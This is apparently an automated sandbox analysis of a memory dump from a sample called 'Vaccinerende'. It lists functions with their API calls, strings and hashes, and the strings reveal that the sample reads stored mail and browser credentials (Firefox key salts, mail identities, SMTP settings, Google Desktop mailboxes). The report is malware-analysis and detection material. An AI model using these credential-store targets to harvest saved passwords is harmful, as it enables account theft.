                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID: global-salt$password-check
                                            • API String ID: 231171946-3927197501
                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                            Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                            • memset.MSVCRT ref: 0040330B
                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                            • strchr.MSVCRT ref: 0040335A
                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                            • strlen.MSVCRT ref: 0040339C
                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                            • String ID: Personalities
                                            • API String ID: 2103853322-4287407858
                                            • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                            • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                            Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32(?), ref: 004090C2
                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientParentPoints
                                            • String ID:
                                            • API String ID: 4247780290-0
                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                            Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • _strcmpi.MSVCRT ref: 0040E134
                                            • _strcmpi.MSVCRT ref: 0040E14D
                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _strcmpi$_mbscpy
                                            • String ID: smtp
                                            • API String ID: 2625860049-60245459
                                            • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                            • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                            Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                            • memset.MSVCRT ref: 00408258
                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                            Strings
                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Close$EnumOpenmemset
                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                            • API String ID: 2255314230-2212045309
                                            • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                            • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                            Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040C28C
                                            • SetFocus.USER32(?,?), ref: 0040C314
                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FocusMessagePostmemset
                                            • String ID: S_@$l
                                            • API String ID: 3436799508-4018740455
                                            • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                            • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                            Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                            • String ID: MS Sans Serif
                                            • API String ID: 3492281209-168460110
                                            • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                            • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                            Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ClassName_strcmpimemset
                                            • String ID: edit
                                            • API String ID: 275601554-2167791130
                                            • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                            • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                            Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040D2C2
                                            • memset.MSVCRT ref: 0040D2D8
                                            • memset.MSVCRT ref: 0040D2EA
                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                            • memset.MSVCRT ref: 0040D319
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                            Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: @
                                            • API String ID: 3510742995-2766056989
                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                            Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _strcmpi
                                            • String ID: C@$mail.identity
                                            • API String ID: 1439213657-721921413
                                            • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                            • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                            Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _ultoasprintf
                                            • String ID: %s %s %s
                                            • API String ID: 432394123-3850900253
                                            • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                            • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                            Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                            • sprintf.MSVCRT ref: 0040909B
                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                            • String ID: menu_%d
                                            • API String ID: 1129539653-2417748251
                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                            Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            APIs
                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                            • _mbscat.MSVCRT ref: 004070FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscat$_mbscpystrlen
                                            • String ID: sqlite3.dll
                                            • API String ID: 1983510840-1155512374
                                            • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                            • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                            Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                            • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID: MZ@
                                            • API String ID: 1378638983-2978689999
                                            • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                            • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                            • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                            • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                            Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0
                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8